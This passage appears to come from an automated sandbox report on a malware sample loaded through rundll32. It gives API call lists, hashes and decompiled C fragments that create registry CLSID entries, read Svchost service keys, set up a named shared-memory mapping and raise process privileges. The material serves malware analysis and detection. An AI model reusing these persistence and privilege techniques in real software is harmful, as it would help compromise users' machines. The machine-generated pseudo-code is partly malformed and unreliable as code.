                                                                                              • RegCloseKey.ADVAPI32(0426B6FC,?,042A6318,?,?,0426B6FC), ref: 0425636D
                                                                                                • Part of subcall function 04266C70: wsprintfW.USER32 ref: 04266CB8
                                                                                                • Part of subcall function 04266C70: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04266CF5
                                                                                                • Part of subcall function 04266C70: RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,?,?), ref: 04266D20
                                                                                                • Part of subcall function 04266C70: RegCloseKey.ADVAPI32(?), ref: 04266D36
                                                                                                • Part of subcall function 04266B70: wsprintfW.USER32 ref: 04266BB5
                                                                                                • Part of subcall function 04266B70: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04266BF2
                                                                                                • Part of subcall function 04266B70: RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,?,?), ref: 04266C1D
                                                                                                • Part of subcall function 04266B70: RegCloseKey.ADVAPI32(?), ref: 04266C33
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020119,?,?,042A6318,?,?,0426B6FC), ref: 04256396
                                                                                              • RegCloseKey.ADVAPI32(?,?,042A6318,?,?,0426B6FC), ref: 042563A3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$QueryValuewsprintf$AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID: SOFTWARE\Classes\.codein
                                                                                              • API String ID: 2055797972-3041101089
                                                                                              • Opcode ID: 63eb442d64d0b8fed67efe2e43cc8b2cb19091a5675db367d2833d3f4706f8fb
                                                                                              • Instruction ID: 11a86e263a16429c31d32a7c3afdadced7de607bfbdda8b54fe85b89e49e4ba6
                                                                                              • Opcode Fuzzy Hash: 63eb442d64d0b8fed67efe2e43cc8b2cb19091a5675db367d2833d3f4706f8fb
                                                                                              • Instruction Fuzzy Hash: CE31E370B24305AFE710AF68ED49769B7E8EF04708F40026DEC4AD7661EB75BC908781
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E042578B0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				char _v616;
                                                                                              				signed int _t15;
                                                                                              				void* _t45;
                                                                                              				signed int _t48;
                                                                                              
                                                                                              				_t15 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t15 ^ _t48;
                                                                                              				_t45 = __edx;
                                                                                              				_push(__edi);
                                                                                              				E04266050(__ebx, __ecx,  &_v88, __edi, __edx);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_t5 = _t45 + 0x13c; // 0x13c
                                                                                              				_v616 = _t5;
                                                                                              				_v612 = 0;
                                                                                              				if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0) != 0) {
                                                                                              					L3:
                                                                                              					return E04275AFE(_v8 ^ _t48);
                                                                                              				} else {
                                                                                              					RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4);
                                                                                              					_t47 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v612);
                                                                                              					_t54 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) == 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						return E04275AFE(_v8 ^ _t48);
                                                                                              					}
                                                                                              				}
                                                                                              			}











                                                                                              0x042578b9
                                                                                              0x042578c0
                                                                                              0x042578c4
                                                                                              0x042578c9
                                                                                              0x042578ca
                                                                                              0x042578df
                                                                                              0x042578e8
                                                                                              0x042578f0
                                                                                              0x042578fc
                                                                                              0x04257921
                                                                                              0x0425796c
                                                                                              0x0425797d
                                                                                              0x04257923
                                                                                              0x0425793a
                                                                                              0x0425794d
                                                                                              0x04257950
                                                                                              0x04257956
                                                                                              0x04257958
                                                                                              0x00000000
                                                                                              0x0425795a
                                                                                              0x0425796b
                                                                                              0x0425796b
                                                                                              0x04257958

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 042578DF
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04257919
                                                                                              • RegSetValueExW.ADVAPI32(?,0429E09C,00000000,00000004,?,00000004), ref: 0425793A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04257950
                                                                                              Strings
                                                                                              • SOFTWARE\Classes\CLSID\%s, xrefs: 042578D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                              • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 73588525-1183003970
                                                                                              • Opcode ID: 1373997dc696ebe92177259c22daf8c9e40038af1c99d6e307c26ce08a01e1c8
                                                                                              • Instruction ID: aefcc6e3fbf8e3305504bb8c6ccce9fc51b61614e4b1a9c588e37d28c83c61ae
                                                                                              • Opcode Fuzzy Hash: 1373997dc696ebe92177259c22daf8c9e40038af1c99d6e307c26ce08a01e1c8
                                                                                              • Instruction Fuzzy Hash: 61116372B15228ABDB20EBA5EC49BEFBBBCEF45710F0001A5A909E6140D6756E04DBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 042622B8
                                                                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 042622C1
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 042622D5
                                                                                              • EnumDisplaySettingsW.USER32(?), ref: 042622FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MonitorWindow$DesktopDisplayEnumFromInfoSettings
                                                                                              • String ID: h
                                                                                              • API String ID: 1862586070-2439710439
                                                                                              • Opcode ID: 1dbf4e517dc03fb31441f866dba77635f3851208ea7c1a029dbffac7a7094427
                                                                                              • Instruction ID: 80b71d802e09cd9797642e2f29c51c7208aed8f49e475ada44e1b8fe1005e54d
                                                                                              • Opcode Fuzzy Hash: 1dbf4e517dc03fb31441f866dba77635f3851208ea7c1a029dbffac7a7094427
                                                                                              • Instruction Fuzzy Hash: 3D2107316147419FD720EF78E849A9AF3A8FB89365F00471EE85997241DB30BC55C792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0426A1E0(char* __ecx, int* __edx) {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				void* __edi;
                                                                                              				char* _t21;
                                                                                              				int* _t22;
                                                                                              
                                                                                              				_t22 = __edx;
                                                                                              				_t21 = __ecx;
                                                                                              				E0427DEA0(__ecx, __ecx, 0,  *((intOrPtr*)(__edx)));
                                                                                              				E0427DEA0(_t21, _t21, 0,  *_t22);
                                                                                              				_v8 = 0;
                                                                                              				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v8) != 0) {
                                                                                              					L3:
                                                                                              					E0427DEA0(_t21, _t21, 0,  *_t22);
                                                                                              					 *_t22 = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					RegQueryValueExW(_v8, L"AppService", 0,  &_v12, _t21, _t22);
                                                                                              					_t17 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v8);
                                                                                              					_t28 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) == 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						return 1;
                                                                                              					}
                                                                                              				}
                                                                                              			}








                                                                                              0x0426a1e8
                                                                                              0x0426a1eb
                                                                                              0x0426a1f2
                                                                                              0x0426a1fd
                                                                                              0x0426a205
                                                                                              0x0426a224
                                                                                              0x0426a25e
                                                                                              0x0426a263
                                                                                              0x0426a26b
                                                                                              0x0426a279
                                                                                              0x0426a226
                                                                                              0x0426a235
                                                                                              0x0426a245
                                                                                              0x0426a248
                                                                                              0x0426a24e
                                                                                              0x0426a250
                                                                                              0x00000000
                                                                                              0x0426a254
                                                                                              0x0426a25d
                                                                                              0x0426a25d
                                                                                              0x0426a250

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0426A21C
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,AppService,00000000,00000000,?,00000104,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0426A235
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0426A248
                                                                                              Strings
                                                                                              • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 0426A212
                                                                                              • AppService, xrefs: 0426A22D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: AppService$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                                                              • API String ID: 3677997916-1367592619
                                                                                              • Opcode ID: 3be4028e1ed88b85c8c7a2497ad7f69a2663dae2979e9901cc7b8122e505f669
                                                                                              • Instruction ID: 42712038ad64328d0ae0c0603235ad953a75306f8d94083290877bcfb628fd21
                                                                                              • Opcode Fuzzy Hash: 3be4028e1ed88b85c8c7a2497ad7f69a2663dae2979e9901cc7b8122e505f669
                                                                                              • Instruction Fuzzy Hash: 3A01DB727501087FFB216EA8BD85FBAB7ADDF85615F10007EFD08E1100DA725D515661
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0425B560(void* __eflags) {
                                                                                              				char _v24;
                                                                                              				long _v28;
                                                                                              				char* _v32;
                                                                                              				char _v36;
                                                                                              				void* _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				void* __ebx;
                                                                                              				void* _t13;
                                                                                              				void* _t14;
                                                                                              				void* _t18;
                                                                                              				void* _t19;
                                                                                              				void* _t20;
                                                                                              				void* _t24;
                                                                                              				void* _t25;
                                                                                              
                                                                                              				_t11 =  &_v24;
                                                                                              				_v44 = 0x429e898;
                                                                                              				_v40 = 0;
                                                                                              				_v36 = 0xc;
                                                                                              				_v32 =  &_v24;
                                                                                              				_v28 = 0;
                                                                                              				_v40 = E0425AE60(_t19, _t24, _t25, _t11);
                                                                                              				_t22 =  ==  ? 0 :  &_v36;
                                                                                              				_t13 = CreateFileMappingW(0xffffffff,  ==  ? 0 :  &_v36, 4, 0, 0xd18, L"_kasssperskdy");
                                                                                              				 *0x42a7ad8 = _t13;
                                                                                              				if(_t13 == 0) {
                                                                                              					L3:
                                                                                              					_t20 = 0;
                                                                                              				} else {
                                                                                              					_t18 = MapViewOfFile(_t13, 6, 0, 0, 0);
                                                                                              					 *0x42a7adc = _t18;
                                                                                              					if(_t18 == 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						_t20 = 1;
                                                                                              					}
                                                                                              				}
                                                                                              				_t14 = _v40;
                                                                                              				_v44 = 0x429e898;
                                                                                              				if(_t14 != 0) {
                                                                                              					HeapFree(GetProcessHeap(), 0, _t14);
                                                                                              				}
                                                                                              				return _t20;
                                                                                              			}

















                                                                                              0x0425b566
                                                                                              0x0425b569
                                                                                              0x0425b572
                                                                                              0x0425b579
                                                                                              0x0425b580
                                                                                              0x0425b583
                                                                                              0x0425b59b
                                                                                              0x0425b5a6
                                                                                              0x0425b5ac
                                                                                              0x0425b5b2
                                                                                              0x0425b5b9
                                                                                              0x0425b5d7
                                                                                              0x0425b5d7
                                                                                              0x0425b5bb
                                                                                              0x0425b5c4
                                                                                              0x0425b5ca
                                                                                              0x0425b5d1
                                                                                              0x00000000
                                                                                              0x0425b5d3
                                                                                              0x0425b5d3
                                                                                              0x0425b5d3
                                                                                              0x0425b5d1
                                                                                              0x0425b5d9
                                                                                              0x0425b5dc
                                                                                              0x0425b5e5
                                                                                              0x0425b5f1
                                                                                              0x0425b5f1
                                                                                              0x0425b5fd

                                                                                              APIs
                                                                                                • Part of subcall function 0425AE60: InitializeSecurityDescriptor.ADVAPI32(0425B60D,00000001,74D0F560,74CB6490), ref: 0425AE8F
                                                                                                • Part of subcall function 0425AE60: AllocateAndInitializeSid.ADVAPI32(0425B58F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0425AEAB
                                                                                                • Part of subcall function 0425AE60: GetLengthSid.ADVAPI32(00000000,74CB6620), ref: 0425AEB9
                                                                                                • Part of subcall function 0425AE60: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0425AEC5
                                                                                                • Part of subcall function 0425AE60: RtlAllocateHeap.NTDLL(00000000), ref: 0425AECC
                                                                                                • Part of subcall function 0425AE60: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 0425AEDC
                                                                                                • Part of subcall function 0425AE60: AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 0425AEF1
                                                                                                • Part of subcall function 0425AE60: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 0425AF02
                                                                                                • Part of subcall function 0425AE60: FreeSid.ADVAPI32(00000000), ref: 0425AF1B
                                                                                                • Part of subcall function 0425AE60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0425AF2B
                                                                                                • Part of subcall function 0425AE60: HeapFree.KERNEL32(00000000), ref: 0425AF32
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,0000000C,00000004,00000000,00000D18,_kasssperskdy,0425B60D,74CB6620), ref: 0425B5AC
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0425B5C4
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0425B5EA
                                                                                              • HeapFree.KERNEL32(00000000), ref: 0425B5F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$FreeInitializeProcess$AllocateDescriptorFileSecurity$AccessAllowedCreateDaclLengthMappingView
                                                                                              • String ID: _kasssperskdy
                                                                                              • API String ID: 1566987605-1033421605
                                                                                              • Opcode ID: 80e98ac31625d0418fbf438bdb1f31b963739953b4f92db79e30e85539dd2f76
                                                                                              • Instruction ID: 9ec917ea4f91a812cfa724301a9d277b31d2ae8786593a268297cfaae953c43a
                                                                                              • Opcode Fuzzy Hash: 80e98ac31625d0418fbf438bdb1f31b963739953b4f92db79e30e85539dd2f76
                                                                                              • Instruction Fuzzy Hash: 7C1152B0B44309AFEF10DFA9EC4ABAE7BF8EB58704F140115E905B62D0DA75AD01CA75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E0426ADD0(WCHAR* __ecx, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				WCHAR* _v16;
                                                                                              				struct _PRIVILEGE_SET _v28;
                                                                                              				int _v32;
                                                                                              				void* _v36;
                                                                                              				struct _LUID _v44;
                                                                                              				signed int _t21;
                                                                                              				WCHAR* _t39;
                                                                                              				signed int _t40;
                                                                                              
                                                                                              				_t21 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t21 ^ _t40;
                                                                                              				_v44.LowPart = 0;
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				_v44.HighPart = 0;
                                                                                              				_t39 = __ecx;
                                                                                              				_v28.PrivilegeCount = 0;
                                                                                              				asm("movups [ebp-0x14], xmm0");
                                                                                              				_v32 = 0;
                                                                                              				_v36 = 0;
                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v36) != 0) {
                                                                                              					LookupPrivilegeValueW(0, _t39,  &_v44);
                                                                                              					_v28.Privilege = _v44.LowPart;
                                                                                              					_v16 = _v44.HighPart;
                                                                                              					_v28.Control = 1;
                                                                                              					_v28.PrivilegeCount = 1;
                                                                                              					_v12 = 2;
                                                                                              					PrivilegeCheck(_v36,  &_v28,  &_v32);
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t40);
                                                                                              			}













                                                                                              0x0426add6
                                                                                              0x0426addd
                                                                                              0x0426ade4
                                                                                              0x0426adec
                                                                                              0x0426adef
                                                                                              0x0426adf8
                                                                                              0x0426adfa
                                                                                              0x0426ae01
                                                                                              0x0426ae05
                                                                                              0x0426ae0c
                                                                                              0x0426ae22
                                                                                              0x0426ae2b
                                                                                              0x0426ae34
                                                                                              0x0426ae3a
                                                                                              0x0426ae44
                                                                                              0x0426ae4f
                                                                                              0x0426ae56
                                                                                              0x0426ae5d
                                                                                              0x0426ae5d
                                                                                              0x0426ae74

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 0426AE13
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0426AE1A
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,00000000), ref: 0426AE2B
                                                                                              • PrivilegeCheck.ADVAPI32(00000000,00000000,00000000), ref: 0426AE5D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivilegeProcess$CheckCurrentLookupOpenTokenValue
                                                                                              • String ID: SeTcbPrivilege
                                                                                              • API String ID: 3991982149-1502394177
                                                                                              • Opcode ID: e633c8c1f20437764fe17fdf40693ef0d33d7bc861df6c71a6103d77fb042933
                                                                                              • Instruction ID: 6d44563726d38e481dce2eab8b1c9141ba9bdd94c2ebfd5915ab7b54fe3570cc
                                                                                              • Opcode Fuzzy Hash: e633c8c1f20437764fe17fdf40693ef0d33d7bc861df6c71a6103d77fb042933
                                                                                              • Instruction Fuzzy Hash: DF11FBB1E0420D9BDB10DF94D849BEEBBF8FF08314F104159E805B2240DBB96A84CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04252500(void* __ecx) {
                                                                                              				void* _t7;
                                                                                              				void* _t8;
                                                                                              				struct HWND__* _t9;
                                                                                              				struct HWND__* _t13;
                                                                                              				void* _t16;
                                                                                              
                                                                                              				_t16 = __ecx;
                                                                                              				_t7 = CreateEventW(0, 0, 0, 0);
                                                                                              				 *(_t16 + 0xc0) = _t7;
                                                                                              				if(_t7 == 0) {
                                                                                              					L3:
                                                                                              					_t8 =  *(_t16 + 0xc0);
                                                                                              					if(_t8 != 0) {
                                                                                              						CloseHandle(_t8);
                                                                                              						 *(_t16 + 0xc0) = 0;
                                                                                              					}
                                                                                              					_t9 =  *(_t16 + 0xc4);
                                                                                              					if(_t9 != 0) {
                                                                                              						CloseWindow(_t9);
                                                                                              						 *(_t16 + 0xc4) = 0;
                                                                                              					}
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t13 = CreateWindowExA(0, "#32770", 0x429d888, 0x80000000, 0, 0, 0, 0, 0, 0, 0, 0);
                                                                                              					 *(_t16 + 0xc4) = _t13;
                                                                                              					if(_t13 == 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						return 1;
                                                                                              					}
                                                                                              				}
                                                                                              			}








                                                                                              0x04252509
                                                                                              0x0425250b
                                                                                              0x04252511
                                                                                              0x04252519
                                                                                              0x04252553
                                                                                              0x04252553
                                                                                              0x0425255b
                                                                                              0x0425255e
                                                                                              0x04252564
                                                                                              0x04252564
                                                                                              0x0425256e
                                                                                              0x04252576
                                                                                              0x04252579
                                                                                              0x0425257f
                                                                                              0x0425257f
                                                                                              0x0425258c
                                                                                              0x0425251b
                                                                                              0x0425253c
                                                                                              0x04252542
                                                                                              0x0425254a
                                                                                              0x00000000
                                                                                              0x0425254c
                                                                                              0x04252552
                                                                                              0x04252552
                                                                                              0x0425254a

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04268072), ref: 0425250B
                                                                                              • CreateWindowExA.USER32(00000000,#32770,0429D888,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0425253C
                                                                                              • CloseHandle.KERNEL32(?), ref: 0425255E
                                                                                              • CloseWindow.USER32(?), ref: 04252579
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateWindow$EventHandle
                                                                                              • String ID: #32770
                                                                                              • API String ID: 1958951703-463685578
                                                                                              • Opcode ID: c4ed5bc63475bb7f002560dbb4288d77ac385fd9246f555d648f3e91ea2b4241
                                                                                              • Instruction ID: 1ffb35dfc4f0d10992db6fb385b3ef2ad0b83c0524532d7bb2e564777e62f608
                                                                                              • Opcode Fuzzy Hash: c4ed5bc63475bb7f002560dbb4288d77ac385fd9246f555d648f3e91ea2b4241
                                                                                              • Instruction Fuzzy Hash: 7BF0FF30395702ABF7345B38BC19F4676D4FB00751F100659FA19E72C0DBB4F8018A64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 15%
                                                                                              			E0425D360(intOrPtr* __ecx, char _a4) {
                                                                                              				void* __esi;
                                                                                              				char _t9;
                                                                                              				_Unknown_base(*)()* _t12;
                                                                                              				char* _t18;
                                                                                              				intOrPtr* _t20;
                                                                                              
                                                                                              				_t18 = __ecx;
                                                                                              				_t9 = _a4;
                                                                                              				_t20 = __ecx;
                                                                                              				 *__ecx = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _t9;
                                                                                              				 *((intOrPtr*)(_t9 + 0x38)) = __ecx;
                                                                                              				 *((intOrPtr*)(_t20 + 8)) = CreateEventW(0, 1, 0, 0);
                                                                                              				 *_t20 = 0x429e97c;
                                                                                              				_t12 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
                                                                                              				if(_t12 == 0) {
                                                                                              					E0426AD30(_t20);
                                                                                              				} else {
                                                                                              					_t18 =  &_a4;
                                                                                              					 *_t12(0x14, 1, 0, _t18);
                                                                                              				}
                                                                                              				_push(_t18);
                                                                                              				_push(0x3f);
                                                                                              				_push(1);
                                                                                              				_push( &_a4);
                                                                                              				_a4 = 0x8d;
                                                                                              				E04251C60( *((intOrPtr*)(_t20 + 4)));
                                                                                              				return _t20;
                                                                                              			}








                                                                                              0x0425d360
                                                                                              0x0425d363
                                                                                              0x0425d369
                                                                                              0x0425d371
                                                                                              0x0425d377
                                                                                              0x0425d37a
                                                                                              0x0425d388
                                                                                              0x0425d38b
                                                                                              0x0425d39d
                                                                                              0x0425d3a5
                                                                                              0x0425d3b5
                                                                                              0x0425d3a7
                                                                                              0x0425d3a7
                                                                                              0x0425d3b1
                                                                                              0x0425d3b1
                                                                                              0x0425d3ba
                                                                                              0x0425d3c1
                                                                                              0x0425d3c3
                                                                                              0x0425d3c5
                                                                                              0x0425d3c6
                                                                                              0x0425d3ca
                                                                                              0x0425d3d3

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0425922C,?,042A78D8,00000000), ref: 0425D37D
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,?,?,0425922C,?,042A78D8,00000000), ref: 0425D391
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0425D39D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressCreateEventLibraryLoadProc
                                                                                              • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                              • API String ID: 3086787778-64178277
                                                                                              • Opcode ID: 4351174d55c1dc49d9ac1152fcf9e226d806cb6bd7f7187d02db15b62c14bfc3
                                                                                              • Instruction ID: 350ca1a618647c299b7ebc55d1536e1d3e25aa7064f22cf482eee60ee30e1307
                                                                                              • Opcode Fuzzy Hash: 4351174d55c1dc49d9ac1152fcf9e226d806cb6bd7f7187d02db15b62c14bfc3
                                                                                              • Instruction Fuzzy Hash: 40016271360305BFEB20AFA8DC46F96BBE4AB18B40F10441CB655DA1D0DAF0B940CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0427F3B5,?,?,0427F355,?,042A1730,0000000C,0427F488,00000000,00000000), ref: 0427F424
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0427F437
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0427F3B5,?,?,0427F355,?,042A1730,0000000C,0427F488,00000000,00000000,00000001,0427625B), ref: 0427F45A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: e57671ee9b6a2aa3cf064ff5db763895e476b8b4738fd656fffc660ef90ad15f
                                                                                              • Instruction ID: 3db7da5d34bb910bd569d8592c8ff6a1e17ddc9db69eba408089412a617ebc08
                                                                                              • Opcode Fuzzy Hash: e57671ee9b6a2aa3cf064ff5db763895e476b8b4738fd656fffc660ef90ad15f
                                                                                              • Instruction Fuzzy Hash: D2F0C831B5421DBBDF10AFA8E85DBADBFB4EF44715F014068F905A2140DF74AD41CA44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E042613C0(intOrPtr __ecx, int _a4, void* _a8) {
                                                                                              				int _v8;
                                                                                              				int _v12;
                                                                                              				int _v16;
                                                                                              				char* _v20;
                                                                                              				int _v24;
                                                                                              				int _v28;
                                                                                              				short* _v32;
                                                                                              				int _v36;
